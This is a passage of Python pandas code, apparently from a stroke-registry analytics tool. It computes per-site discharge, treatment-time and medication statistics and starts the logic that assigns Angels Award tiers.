self.tmp = discharge_subset_same_centre.groupby(['Protocol ID', 'DISCHARGE_SAME_FACILITY']).size().to_frame('count').reset_index()
del discharge_subset_same_centre
for facility_code, facility_label in ((1, 'Acute rehabilitation'), (2, 'Post-care bed'), (3, 'Another department')):
    count_column = '# transferred within the same centre - ' + facility_label
    percent_column = '% transferred within the same centre - ' + facility_label
    self.statsDf = self._get_values_for_factors(column_name="DISCHARGE_SAME_FACILITY", value=facility_code, new_column_name=count_column)
    # Bind count_column as a default argument (late-binding closure pitfall).
    self.statsDf[percent_column] = self.statsDf.apply(
        lambda row, count_column=count_column: round((row[count_column] / row['discharge_subset_same_centre_patients']) * 100, 2) if row['discharge_subset_same_centre_patients'] > 0 else 0,
        axis=1)
############################################
# DISCHARGE DESTINATION - ANOTHER FACILITY #
############################################
# Breakdown of patients transferred to another centre (destination code 3)
# by DISCHARGE_OTHER_FACILITY.
discharge_subset_another_centre = discharge_subset[discharge_subset['DISCHARGE_DESTINATION'].isin([3])].copy()
self.statsDf['discharge_subset_another_centre_patients'] = self._count_patients(dataframe=discharge_subset_another_centre)
self.tmp = discharge_subset_another_centre.groupby(['Protocol ID', 'DISCHARGE_OTHER_FACILITY']).size().to_frame('count').reset_index()
# Calculate number of patients entered to the old form (sentinel -999);
# excluded from the percentage denominators below.
self.statsDf = self._get_values_for_factors(column_name="DISCHARGE_OTHER_FACILITY", value=-999, new_column_name='tmp')
self.statsDf = self._get_values_for_factors(column_name="DISCHARGE_OTHER_FACILITY", value=1, new_column_name='# transferred to another centre - Stroke centre')
self.statsDf['% transferred to another centre - Stroke centre'] = self.statsDf.apply(lambda x: round(((x['# transferred to another centre - Stroke centre']/(x['discharge_subset_another_centre_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_another_centre_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DISCHARGE_OTHER_FACILITY", value=2, new_column_name='# transferred to another centre - Comprehensive stroke centre')
self.statsDf['% transferred to another centre - Comprehensive stroke centre'] = self.statsDf.apply(lambda x: round(((x['# transferred to another centre - Comprehensive stroke centre']/(x['discharge_subset_another_centre_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_another_centre_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="DISCHARGE_OTHER_FACILITY", value=3, new_column_name='# transferred to another centre - Another hospital')
self.statsDf['% transferred to another centre - Another hospital'] = self.statsDf.apply(lambda x: round(((x['# transferred to another centre - Another hospital']/(x['discharge_subset_another_centre_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_another_centre_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf.drop(['tmp'], inplace=True, axis=1)
#########################################################
# DISCHARGE DESTINATION - ANOTHER FACILITY - DEPARTMENT #
#########################################################
# Department breakdown: a patient may have up to three department fields
# (O1/O2/O3); counts for the same department value are summed across them.
self.tmp = discharge_subset_another_centre.groupby(['Protocol ID', 'DISCHARGE_OTHER_FACILITY_O1']).size().to_frame('count').reset_index()
tmp_o2 = discharge_subset_another_centre.groupby(['Protocol ID', 'DISCHARGE_OTHER_FACILITY_O2']).size().to_frame('count').reset_index()
tmp_o3 = discharge_subset_another_centre.groupby(['Protocol ID', 'DISCHARGE_OTHER_FACILITY_O3']).size().to_frame('count').reset_index()
del discharge_subset_another_centre
# 'tmp' is hard-coded to 0 here (unlike the previous section, no old-form
# sentinel is counted), so the "- x['tmp']" in the denominators below is a
# no-op kept for symmetry with the surrounding sections.
self.statsDf.loc[:, 'tmp'] = 0
self.statsDf['# department transferred to within another centre - Acute rehabilitation'] = self._get_values_only_columns(column_name="DISCHARGE_OTHER_FACILITY_O1", value=1, dataframe=self.tmp) + self._get_values_only_columns(column_name="DISCHARGE_OTHER_FACILITY_O2", value=1, dataframe=tmp_o2) + self._get_values_only_columns(column_name="DISCHARGE_OTHER_FACILITY_O3", value=1, dataframe=tmp_o3)
self.statsDf['% department transferred to within another centre - Acute rehabilitation'] = self.statsDf.apply(lambda x: round(((x['# department transferred to within another centre - Acute rehabilitation']/(x['discharge_subset_another_centre_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_another_centre_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf['# department transferred to within another centre - Post-care bed'] = self._get_values_only_columns(column_name="DISCHARGE_OTHER_FACILITY_O1", value=2, dataframe=self.tmp) + self._get_values_only_columns(column_name="DISCHARGE_OTHER_FACILITY_O2", value=2, dataframe=tmp_o2) + self._get_values_only_columns(column_name="DISCHARGE_OTHER_FACILITY_O3", value=2, dataframe=tmp_o3)
self.statsDf['% department transferred to within another centre - Post-care bed'] = self.statsDf.apply(lambda x: round(((x['# department transferred to within another centre - Post-care bed']/(x['discharge_subset_another_centre_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_another_centre_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf['# department transferred to within another centre - Neurology'] = self._get_values_only_columns(column_name="DISCHARGE_OTHER_FACILITY_O1", value=3, dataframe=self.tmp) + self._get_values_only_columns(column_name="DISCHARGE_OTHER_FACILITY_O2", value=3, dataframe=tmp_o2) + self._get_values_only_columns(column_name="DISCHARGE_OTHER_FACILITY_O3", value=3, dataframe=tmp_o3)
self.statsDf['% department transferred to within another centre - Neurology'] = self.statsDf.apply(lambda x: round(((x['# department transferred to within another centre - Neurology']/(x['discharge_subset_another_centre_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_another_centre_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf['# department transferred to within another centre - Another department'] = self._get_values_only_columns(column_name="DISCHARGE_OTHER_FACILITY_O1", value=4, dataframe=self.tmp) + self._get_values_only_columns(column_name="DISCHARGE_OTHER_FACILITY_O2", value=4, dataframe=tmp_o2) + self._get_values_only_columns(column_name="DISCHARGE_OTHER_FACILITY_O3", value=4, dataframe=tmp_o3)
self.statsDf['% department transferred to within another centre - Another department'] = self.statsDf.apply(lambda x: round(((x['# department transferred to within another centre - Another department']/(x['discharge_subset_another_centre_patients'] - x['tmp'])) * 100), 2) if (x['discharge_subset_another_centre_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf.drop(['tmp'], inplace=True, axis=1)
#################
# DISCHARGE MRS #
#################
# (The original banner here wrongly repeated "DISCHARGE DESTINATION - ANOTHER
# FACILITY"; this section prepares the discharge mRS subset.)
# After fillna(0), DISCHARGE_MRS == 0 marks missing values, which are excluded.
discharge_subset.fillna(0, inplace=True)
discharge_subset_mrs = discharge_subset[~discharge_subset['DISCHARGE_MRS'].isin([0])].copy()
del discharge_subset
#discharge_subset_mrs['DISCHARGE_MRS'] = discharge_subset_mrs['DISCHARGE_MRS'].astype(float)
def convert_mrs_on_discharge(x):
""" The function calculating mRS on discharge. Options: 1 (unknown/derivate), 2 = 0, 3 = 1, 4 = 2, 5 = 3, 6 = 4, 7 = 5, 8 = 6.
:param x: the mRS value from the dropdown
:type x: int
:returns: x -- value converted to score
"""
x = float(x)
if (x == 1):
x = x - 1
else:
x = x - 2
return x
if discharge_subset_mrs.empty:
self.statsDf['Median discharge mRS'] = 0
self.statsDf.fillna(0, inplace=True)
else:
discharge_subset_mrs['DISCHARGE_MRS_ADJUSTED'] = discharge_subset_mrs.apply(lambda row: convert_mrs_on_discharge(row['DISCHARGE_MRS']), axis=1)
discharge_subset_mrs['DISCHARGE_MRS_ADDED'] = discharge_subset_mrs['DISCHARGE_MRS_ADJUSTED'] + discharge_subset_mrs['D_MRS_SCORE']
discharge_subset_mrs.fillna(0, inplace=True)
self.statsDf = self.statsDf.merge(discharge_subset_mrs.groupby(['Protocol ID']).DISCHARGE_MRS_ADDED.agg(['median']).rename(columns={'median': 'Median discharge mRS'})['Median discharge mRS'].reset_index(), how='outer')
self.statsDf.fillna(0, inplace=True)
del discharge_subset_mrs
########################
# MEDIAN HOSPITAL STAY #
########################
positive_hospital_days = self.df[self.df['HOSPITAL_DAYS'] > 0]
self.statsDf = self.statsDf.merge(positive_hospital_days.groupby(['Protocol ID']).HOSPITAL_DAYS.agg(['median']).rename(columns={'median': 'Median hospital stay (days)'})['Median hospital stay (days)'].reset_index(), how='outer')
self.statsDf.fillna(0, inplace=True)
del positive_hospital_days
###########################
# MEDIAN LAST SEEN NORMAL #
###########################
self.statsDf = self.statsDf.merge(self.df[self.df['LAST_SEEN_NORMAL'] != 0].groupby(['Protocol ID']).LAST_SEEN_NORMAL.agg(['median']).rename(columns={'median': 'Median last seen normal'})['Median last seen normal'].reset_index(), how='outer')
self.statsDf.fillna(0, inplace=True)
# ELIGIBLE RECANALIZATION
wrong_ivtpa = recanalization_procedure_iv_tpa.loc[recanalization_procedure_iv_tpa['IVTPA'] <= 0]
self.statsDf['wrong_ivtpa'] = self._count_patients(dataframe=wrong_ivtpa)
# self.statsDf.loc[:, '# patients eligible thrombolysis'] = self.statsDf.apply(lambda x: (x['# recanalization procedures - IV tPa'] + x['# recanalization procedures - IV tPa + endovascular treatment'] + x['# recanalization procedures - IV tPa + referred to another centre for endovascular treatment']) - x['wrong_ivtpa'], axis=1)
self.statsDf.loc[:, '# patients eligible thrombolysis'] = self.statsDf.apply(lambda x: x['# IV tPa'] - x['wrong_ivtpa'], axis=1)
self.statsDf.drop(['wrong_ivtpa'], inplace=True, axis=1)
del wrong_ivtpa
wrong_tby = recanalization_procedure_tby_dtg[recanalization_procedure_tby_dtg['TBY'] <= 0]
self.statsDf['wrong_tby'] = self._count_patients(dataframe=wrong_tby)
self.statsDf.loc[:, '# patients eligible thrombectomy'] = self.statsDf.apply(lambda x: (x['# TBY'] - x['wrong_tby']), axis=1)
self.statsDf.drop(['wrong_tby'], inplace=True, axis=1)
# if country_code == 'CZ':
# self.statsDf.loc[:, '# patients eligible thrombectomy'] = self.statsDf.apply(lambda x: (x['# recanalization procedures - IV tPa + endovascular treatment'] + x['# recanalization procedures - Endovascular treatment alone'] + x['# recanalization procedures - Referred to another centre for endovascular treatment and hospitalization continues at the referred to centre'] + x['# recanalization procedures - Referred for endovascular treatment and patient is returned to the initial centre']) - x['wrong_tby'], axis=1)
#
# else:
# self.statsDf.loc[:, '# patients eligible thrombectomy'] = self.statsDf.apply(lambda x: (x['# recanalization procedures - IV tPa + endovascular treatment'] + x['# recanalization procedures - Endovascular treatment alone']) - x['wrong_tby'], axis=1)
# self.statsDf.drop(['wrong_tby'], inplace=True, axis=1)
# self.statsDf.loc[:, 'patients_eligible_recanalization'] = self.statsDf.apply(lambda x: x['# recanalization procedures - Not done'] + x['# recanalization procedures - IV tPa'] + x['# recanalization procedures - IV tPa + endovascular treatment'] + x['# recanalization procedures - Endovascular treatment alone'] + x['# recanalization procedures - IV tPa + referred to another centre for endovascular treatment'], axis=1)
del wrong_tby
ivt_tby_mix = isch.loc[(isch['IVT_DONE'] == 1) | (isch['TBY_DONE'] == 1)].copy()
self.statsDf['patients_eligible_recanalization'] = self._count_patients(dataframe=ivt_tby_mix)
del ivt_tby_mix
################
# ANGEL AWARDS #
################
self.total_patient_column = '# total patients >= {0}'.format(self.patient_limit)
self.statsDf[self.total_patient_column] = self.statsDf['Total Patients'] >= self.patient_limit
## Calculate classic recanalization procedure
#recanalization_procedure_tby_only_dtg = recanalization_procedure_tby_dtg[recanalization_procedure_tby_dtg['RECANALIZATION_PROCEDURES'].isin([4])]
recanalization_procedure_tby_only_dtg = recanalization_procedure_tby_dtg.loc[
recanalization_procedure_tby_dtg['IVT_DONE'] == 0
]
# Create temporary dataframe only with rows where thrombolysis was performed under 60 minute
recanalization_procedure_iv_tpa_under_60 = recanalization_procedure_iv_tpa.loc[(recanalization_procedure_iv_tpa['IVTPA'] > 0) & (recanalization_procedure_iv_tpa['IVTPA'] <= 60)]
# Create temporary dataframe only with rows where thrombolysis was performed under 45 minute
recanalization_procedure_iv_tpa_under_45 = recanalization_procedure_iv_tpa.loc[(recanalization_procedure_iv_tpa['IVTPA'] > 0) & (recanalization_procedure_iv_tpa['IVTPA'] <= 45)]
del recanalization_procedure_iv_tpa
recanalization_procedure_tby_only_dtg_under_60 = recanalization_procedure_tby_only_dtg.loc[(recanalization_procedure_tby_only_dtg['TBY'] > 0) & (recanalization_procedure_tby_only_dtg['TBY'] <= 60)]
self.statsDf['# patients treated with door to recanalization therapy < 60 minutes'] = self._count_patients(dataframe=recanalization_procedure_iv_tpa_under_60) + self._count_patients(dataframe=recanalization_procedure_tby_only_dtg_under_60)
self.statsDf['% patients treated with door to recanalization therapy < 60 minutes'] = self.statsDf.apply(lambda x: round(((x['# patients treated with door to recanalization therapy < 60 minutes']/x['# patients recanalized']) * 100), 2) if x['# patients recanalized'] > 0 else 0, axis=1)
recanalization_procedure_tby_only_dtg_under_45 = recanalization_procedure_tby_only_dtg.loc[(recanalization_procedure_tby_only_dtg['TBY'] > 0) & (recanalization_procedure_tby_only_dtg['TBY'] <= 45)]
self.statsDf['# patients treated with door to recanalization therapy < 45 minutes'] = self._count_patients(dataframe=recanalization_procedure_iv_tpa_under_45) + self._count_patients(dataframe=recanalization_procedure_tby_only_dtg_under_45)
self.statsDf['% patients treated with door to recanalization therapy < 45 minutes'] = self.statsDf.apply(lambda x: round(((x['# patients treated with door to recanalization therapy < 45 minutes']/x['# patients recanalized']) * 100), 2) if x['# patients recanalized'] > 0 else 0, axis=1)
del recanalization_procedure_tby_only_dtg
#### DOOR TO THROMBOLYSIS THERAPY - MINUTES ####
# If thrombectomy done not at all, take the possible lowest award they can get
self.statsDf['# patients treated with door to thrombolysis < 60 minutes'] = self._count_patients(dataframe=recanalization_procedure_iv_tpa_under_60)
self.statsDf['% patients treated with door to thrombolysis < 60 minutes'] = self.statsDf.apply(lambda x: round(((x['# patients treated with door to thrombolysis < 60 minutes']/x['# patients eligible thrombolysis']) * 100), 2) if x['# patients eligible thrombolysis'] > 0 else 0, axis=1)
del recanalization_procedure_iv_tpa_under_60
self.statsDf['# patients treated with door to thrombolysis < 45 minutes'] = self._count_patients(dataframe=recanalization_procedure_iv_tpa_under_45)
self.statsDf['% patients treated with door to thrombolysis < 45 minutes'] = self.statsDf.apply(lambda x: round(((x['# patients treated with door to thrombolysis < 45 minutes']/x['# patients eligible thrombolysis']) * 100), 2) if x['# patients eligible thrombolysis'] > 0 else 0, axis=1)
del recanalization_procedure_iv_tpa_under_45
# Create temporary dataframe only with rows where trombectomy was performed under 90 minutes
recanalization_procedure_tby_only_dtg_under_120 = recanalization_procedure_tby_dtg.loc[(recanalization_procedure_tby_dtg['TBY'] > 0) & (recanalization_procedure_tby_dtg['TBY'] <= 120)]
# Create temporary dataframe only with rows where trombectomy was performed under 60 minutes
recanalization_procedure_tby_only_dtg_under_90 = recanalization_procedure_tby_dtg.loc[(recanalization_procedure_tby_dtg['TBY'] > 0) & (recanalization_procedure_tby_dtg['TBY'] <= 90)]
del recanalization_procedure_tby_dtg
self.statsDf['# patients treated with door to thrombectomy < 120 minutes'] = self._count_patients(dataframe=recanalization_procedure_tby_only_dtg_under_120)
self.statsDf['% patients treated with door to thrombectomy < 120 minutes'] = self.statsDf.apply(lambda x: round(((x['# patients treated with door to thrombectomy < 120 minutes']/x['# patients eligible thrombectomy']) * 100), 2) if x['# patients eligible thrombectomy'] > 0 else 0, axis=1)
del recanalization_procedure_tby_only_dtg_under_120
self.statsDf['# patients treated with door to thrombectomy < 90 minutes'] = self._count_patients(dataframe=recanalization_procedure_tby_only_dtg_under_90)
self.statsDf['% patients treated with door to thrombectomy < 90 minutes'] = self.statsDf.apply(lambda x: round(((x['# patients treated with door to thrombectomy < 90 minutes']/x['# patients eligible thrombectomy']) * 100), 2) if x['# patients eligible thrombectomy'] > 0 else 0, axis=1)
del recanalization_procedure_tby_only_dtg_under_90
#### RECANALIZATION RATE ####
self.statsDf['# recanalization rate out of total ischemic incidence'] = self.statsDf['# patients recanalized']
self.statsDf['% recanalization rate out of total ischemic incidence'] = self.statsDf['% patients recanalized']
#### CT/MRI ####
self.statsDf['# suspected stroke patients undergoing CT/MRI'] = self.statsDf['# CT/MRI - performed']
self.statsDf['% suspected stroke patients undergoing CT/MRI'] = self.statsDf['% CT/MRI - performed']
#### DYSPHAGIA SCREENING ####
self.statsDf['# all stroke patients undergoing dysphagia screening'] = self.statsDf['# dysphagia screening - Guss test'] + self.statsDf['# dysphagia screening - Other test']
self.statsDf['% all stroke patients undergoing dysphagia screening'] = self.statsDf.apply(lambda x: round(((x['# all stroke patients undergoing dysphagia screening']/(x['# all stroke patients undergoing dysphagia screening'] + x['# dysphagia screening - Not done'])) * 100), 2) if (x['# all stroke patients undergoing dysphagia screening'] + x['# dysphagia screening - Not done']) > 0 else 0, axis=1)
#### ISCHEMIC STROKE + NO AFIB + ANTIPLATELETS ####
# Exclude patients referred for recanalization procedure
non_transferred_antiplatelets = antithrombotics[~antithrombotics['RECANALIZATION_PROCEDURES'].isin([5,6])]
# Get temporary dataframe with patients who have prescribed antithrombotics and ischemic stroke
antiplatelets = non_transferred_antiplatelets[
non_transferred_antiplatelets['STROKE_TYPE'].isin([1])]
del non_transferred_antiplatelets
# Filter temporary dataframe and get only patients who have not been detected or not known for aFib flutter.
antiplatelets = antiplatelets[antiplatelets['AFIB_FLUTTER'].isin([4, 5])]
# Get patients who have prescribed antithrombotics
# exclude also patients with option 11 - applies to PT form
except_recommended = antiplatelets[~antiplatelets['ANTITHROMBOTICS'].isin([9, 11])]
# Get number of patients who have prescribed antithrombotics and ischemic stroke, have not been detected or not known for aFib flutter.
self.statsDf['except_recommended_patients'] = self._count_patients(dataframe=except_recommended)
# Get temporary dataframe groupby protocol ID and antithrombotics column
self.tmp = antiplatelets.groupby(['Protocol ID', 'ANTITHROMBOTICS']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=1, new_column_name='# ischemic stroke patients discharged with antiplatelets')
self.statsDf['% ischemic stroke patients discharged with antiplatelets'] = self.statsDf.apply(lambda x: round(((x['# ischemic stroke patients discharged with antiplatelets']/x['except_recommended_patients']) * 100), 2) if x['except_recommended_patients'] > 0 else 0, axis=1)
# discharged home
antiplatelets_discharged_home = antiplatelets[antiplatelets['DISCHARGE_DESTINATION'].isin([1])]
if (antiplatelets_discharged_home.empty):
self.tmp = antiplatelets.groupby(['Protocol ID', 'ANTITHROMBOTICS']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=1, new_column_name='# ischemic stroke patients discharged home with antiplatelets')
self.statsDf['% ischemic stroke patients discharged home with antiplatelets'] = self.statsDf.apply(lambda x: round(((x['# ischemic stroke patients discharged home with antiplatelets']/x['except_recommended_patients']) * 100), 2) if x['except_recommended_patients'] > 0 else 0, axis=1)
self.statsDf['except_recommended_discharged_home_patients'] = self.statsDf['except_recommended_patients']
else:
self.tmp = antiplatelets_discharged_home.groupby(['Protocol ID', 'ANTITHROMBOTICS']).size().to_frame('count').reset_index()
# Get patients who have prescribed antithrombotics
except_recommended_discharged_home = except_recommended[except_recommended['DISCHARGE_DESTINATION'].isin([1])]
# Get number of patients who have prescribed antithrombotics and ischemic stroke, have not been detected or not known for aFib flutter.
self.statsDf['except_recommended_discharged_home_patients'] = self._count_patients(dataframe=except_recommended_discharged_home)
self.statsDf = self._get_values_for_factors(column_name="ANTITHROMBOTICS", value=1, new_column_name='# ischemic stroke patients discharged home with antiplatelets')
self.statsDf['% ischemic stroke patients discharged home with antiplatelets'] = self.statsDf.apply(lambda x: round(((x['# ischemic stroke patients discharged home with antiplatelets']/x['except_recommended_discharged_home_patients']) * 100), 2) if x['except_recommended_discharged_home_patients'] > 0 else 0, axis=1)
# Comapre number of ischemic stroke patients discharged with antiplatelets to the discharged home with antiplatelets and select the higher value
self.statsDf['# ischemic stroke patients discharged (home) with antiplatelets'] = self.statsDf.apply(lambda x: x['# ischemic stroke patients discharged with antiplatelets'] if x['# ischemic stroke patients discharged with antiplatelets'] > x['# ischemic stroke patients discharged home with antiplatelets'] else x['# ischemic stroke patients discharged home with antiplatelets'], axis=1)
self.statsDf['% ischemic stroke patients discharged (home) with antiplatelets'] = self.statsDf.apply(lambda x: x['% ischemic stroke patients discharged with antiplatelets'] if x['% ischemic stroke patients discharged with antiplatelets'] > x['% ischemic stroke patients discharged home with antiplatelets'] else x['% ischemic stroke patients discharged home with antiplatelets'], axis=1)
#### ISCHEMIC STROKE + AFIB + ANTICOAGULANTS ####
afib_flutter_detected = is_tia.loc[
is_tia['AFIB_FLUTTER'].isin([1, 2, 3])
].copy()
# exclude also patients with option 11 - applies to PT form
anticoagulants_prescribed = afib_flutter_detected[
~afib_flutter_detected['ANTITHROMBOTICS'].isin([1, 10, 9, 11]) &
~afib_flutter_detected['DISCHARGE_DESTINATION'].isin([5])
].copy()
not_transferred_afib_flutter_detected = afib_flutter_detected.loc[
~afib_flutter_detected['RECANALIZATION_PROCEDURES'].isin([5,6])
]
non_trasferred_anticoagulants = anticoagulants_prescribed[
~anticoagulants_prescribed['RECANALIZATION_PROCEDURES'].isin([5,6])
]
self.statsDf['# afib patients discharged with anticoagulants'] = self._count_patients(dataframe=non_trasferred_anticoagulants)
#self.statsDf['# afib patients discharged with anticoagulants'] = self._count_patients(dataframe=anticoagulants_prescribed)
# Get temporary dataframe with patients who are not dead with detected aFib flutter and with prescribed antithrombotics or with nothign (ANTITHROMBOTICS = 10)
# exclude also patients with option 11 - applies to PT form
afib_detected_discharged_home = not_transferred_afib_flutter_detected[
(~not_transferred_afib_flutter_detected['DISCHARGE_DESTINATION'].isin([5])) &
(~not_transferred_afib_flutter_detected['ANTITHROMBOTICS'].isin([1,9,11]))
]
# Get afib patients discharged and not dead
self.statsDf['afib_detected_discharged_patients'] = self._count_patients(dataframe=afib_detected_discharged_home)
# self.statsDf['% afib patients discharged with anticoagulants'] = self.statsDf.apply(lambda x: round(((x['# afib patients discharged with anticoagulants']/(x['afib_flutter_detected_patients'] - x['afib_flutter_detected_dead_patients'])) * 100), 2) if (x['afib_flutter_detected_patients'] - x['afib_flutter_detected_dead_patients']) > 0 else 0, axis=1)
self.statsDf['% afib patients discharged with anticoagulants'] = self.statsDf.apply(
lambda x: round((
(x['# afib patients discharged with anticoagulants']/x['afib_detected_discharged_patients']) * 100
), 2) if (x['afib_detected_discharged_patients']) > 0 else 0, axis=1
)
# Get temporary dataframe with patients who have prescribed anticoagulats and were discharged home
anticoagulants_prescribed_discharged_home = non_trasferred_anticoagulants[
non_trasferred_anticoagulants['DISCHARGE_DESTINATION'].isin([1])
]
# anticoagulants_prescribed_discharged_home = anticoagulants_prescribed[anticoagulants_prescribed['DISCHARGE_DESTINATION'].isin([1])]
# Get temporary dataframe with patients who have been discharge at home with detected aFib flutter and with prescribed antithrombotics
# afib_detected_discharged_home = afib_flutter_detected[(afib_flutter_detected['DISCHARGE_DESTINATION'].isin([1])) & (~afib_flutter_detected['ANTITHROMBOTICS'].isin([9]))]
# exclude also patients with option 11 - applies to PT form
afib_detected_discharged_home = not_transferred_afib_flutter_detected[
(not_transferred_afib_flutter_detected['DISCHARGE_DESTINATION'].isin([1])) &
(~not_transferred_afib_flutter_detected['ANTITHROMBOTICS'].isin([1,9,11]))
]
# Check if temporary dataframe is empty. If yes, the value is calculated not only for discharged home, but only dead patients are excluded
if (anticoagulants_prescribed_discharged_home.empty):
# afib patients discharged home with anticoagulants
anticoagulants_prescribed_discharged_home = non_trasferred_anticoagulants.copy()
# Get temporary dataframe with patients who are not dead with detected aFib flutter and with prescribed antithrombotics
# exclude also patients with option 11 - applies to PT form
afib_detected_discharged_home = not_transferred_afib_flutter_detected[
(~not_transferred_afib_flutter_detected['DISCHARGE_DESTINATION'].isin([5])) &
(~not_transferred_afib_flutter_detected['ANTITHROMBOTICS'].isin([1,9,11]))
]
# Get # afib patients discharged home with anticoagulants
self.statsDf['# afib patients discharged home with anticoagulants'] = self._count_patients(dataframe=anticoagulants_prescribed_discharged_home)
# Get afib patients discharged and not dead
self.statsDf['afib_detected_discharged_home_patients'] = self._count_patients(dataframe=afib_detected_discharged_home)
# Get % afib patients discharge with anticoagulants and not dead
self.statsDf['% afib patients discharged home with anticoagulants'] = self.statsDf.apply(lambda x: round(((x['# afib patients discharged home with anticoagulants']/x['afib_detected_discharged_home_patients']) * 100), 2) if x['afib_detected_discharged_home_patients'] > 0 else 0, axis=1)
else:
self.statsDf['# afib patients discharged home with anticoagulants'] = self._count_patients(dataframe=anticoagulants_prescribed_discharged_home)
# Get afib patients discharged home
self.statsDf['afib_detected_discharged_home_patients'] = self._count_patients(dataframe=afib_detected_discharged_home)
self.statsDf['% afib patients discharged home with anticoagulants'] = self.statsDf.apply(lambda x: round(((x['# afib patients discharged home with anticoagulants']/x['afib_detected_discharged_home_patients']) * 100), 2) if x['afib_detected_discharged_home_patients'] > 0 else 0, axis=1)
self.statsDf['# afib patients discharged (home) with anticoagulants'] = self.statsDf.apply(lambda x: x['# afib patients discharged with anticoagulants'] if x['% afib patients discharged with anticoagulants'] > x['% afib patients discharged home with anticoagulants'] else x['# afib patients discharged home with anticoagulants'], axis=1)
self.statsDf['% afib patients discharged (home) with anticoagulants'] = self.statsDf.apply(lambda x: x['% afib patients discharged with anticoagulants'] if x['% afib patients discharged with anticoagulants'] > x['% afib patients discharged home with anticoagulants'] else x['% afib patients discharged home with anticoagulants'], axis=1)
#### STROKE UNIT ####
# stroke patients treated in a dedicated stroke unit / ICU
self.statsDf['# stroke patients treated in a dedicated stroke unit / ICU'] = self.statsDf['# patients hospitalized in stroke unit / ICU']
# % stroke patients treated in a dedicated stroke unit / ICU
self.statsDf['% stroke patients treated in a dedicated stroke unit / ICU'] = self.statsDf['% patients hospitalized in stroke unit / ICU']
# Create temporary dataframe to calculate final award
self.angels_awards_tmp = self.statsDf[[self.total_patient_column, '% patients treated with door to recanalization therapy < 60 minutes', '% patients treated with door to recanalization therapy < 45 minutes', '% patients treated with door to thrombolysis < 60 minutes', '% patients treated with door to thrombolysis < 45 minutes', '% patients treated with door to thrombectomy < 120 minutes', '% patients treated with door to thrombectomy < 90 minutes', '% recanalization rate out of total ischemic incidence', '% suspected stroke patients undergoing CT/MRI', '% all stroke patients undergoing dysphagia screening', '% ischemic stroke patients discharged (home) with antiplatelets', '% afib patients discharged (home) with anticoagulants', '% stroke patients treated in a dedicated stroke unit / ICU', '# patients eligible thrombectomy', '# patients eligible thrombolysis']]
#self.angels_awards_tmp = self.statsDf[[self.total_patient_column, '% patients treated with door to recanalization therapy < 60 minutes', '% patients treated with door to recanalization therapy < 45 minutes', '% patients treated with door to thrombolysis < 60 minutes', '% patients treated with door to thrombolysis < 45 minutes', '% patients treated with door to thrombectomy < 120 minutes', '% patients treated with door to thrombectomy < 90 minutes', '% recanalization rate out of total ischemic incidence', '% suspected stroke patients undergoing CT/MRI', '% all stroke patients undergoing dysphagia screening', '% ischemic stroke patients discharged (home) with antiplatelets', '% patients prescribed anticoagulants with aFib', '% stroke patients treated in a dedicated stroke unit / ICU', '# patients eligible thrombectomy', '# patients eligible thrombolysis']]
self.statsDf.fillna(0, inplace=True)
self.angels_awards_tmp.loc[:, 'Proposed Award (old calculation)'] = self.angels_awards_tmp.apply(lambda x: self._get_final_award(x, new_calculation=False), axis=1)
self.angels_awards_tmp.loc[:, 'Proposed Award'] = self.angels_awards_tmp.apply(lambda x: self._get_final_award(x, new_calculation=True), axis=1)
self.statsDf['Proposed Award (old calculation)'] = self.angels_awards_tmp['Proposed Award (old calculation)']
self.statsDf['Proposed Award'] = self.angels_awards_tmp['Proposed Award']
self.statsDf.rename(columns={"Protocol ID": "Site ID"}, inplace=True)
self.statsDf.drop_duplicates(inplace=True)
self.sites = self._get_sites(self.statsDf)
del isch, is_ich_tia_cvt, is_ich_cvt, is_ich, is_tia, is_ich_sah_cvt, is_tia_cvt, cvt, ich_sah, ich, sah, discharge_subset_alive
def _get_final_award(self, x, new_calculation=True):
    """ The function calculating the proposed Angels Award for one site.

    The award ladder is STROKEREADY < GOLD < PLATINUM < DIAMOND. The first
    metric (thrombolysis or combined recanalization time) sets the initial
    award; each subsequent metric can only keep or downgrade it, and a metric
    below its lowest threshold resets the award to STROKEREADY.

    :param x: the row from temporary dataframe (one site's statistics)
    :type x: pandas series
    :param new_calculation: if True, grade door-to-thrombolysis and
        door-to-thrombectomy separately; otherwise grade the combined
        door-to-recanalization therapy times
    :type new_calculation: bool
    :returns: award -- the proposed award
    """
    # Sites below the minimum patient count are always STROKEREADY.
    if x[self.total_patient_column] == False:
        award = "STROKEREADY"
    else:
        if new_calculation:
            thrombolysis_therapy_lt_60min = x['% patients treated with door to thrombolysis < 60 minutes']
            # Calculate award for thrombolysis, if no patients were eligible for thrombolysis and number of total patients was greater than minimum than the award is set to DIAMOND
            if (float(thrombolysis_therapy_lt_60min) >= 50 and float(thrombolysis_therapy_lt_60min) <= 74.99):
                award = "GOLD"
            elif (float(thrombolysis_therapy_lt_60min) >= 75):
                award = "DIAMOND"
            else:
                award = "STROKEREADY"
            thrombolysis_therapy_lt_45min = x['% patients treated with door to thrombolysis < 45 minutes']
            if award != "STROKEREADY":
                if (float(thrombolysis_therapy_lt_45min) <= 49.99):
                    # NOTE(review): the `or award == "DIAMOND"` term is redundant --
                    # the whole condition reduces to `award != "GOLD"`. Kept as-is;
                    # confirm intent before simplifying.
                    if (award != "GOLD" or award == "DIAMOND"):
                        award = "PLATINUM"
                elif (float(thrombolysis_therapy_lt_45min) >= 50):
                    if (award != "GOLD"):
                        award = "DIAMOND"
            else:
                award = "STROKEREADY"
            # Calculate award for thrombectomy, if no patients were eligible for thrombectomy and number of total patients was greater than minimum than the award is set to the possible proposed award (eg. if in thrombolysis step award was set to GOLD then the award will be GOLD)
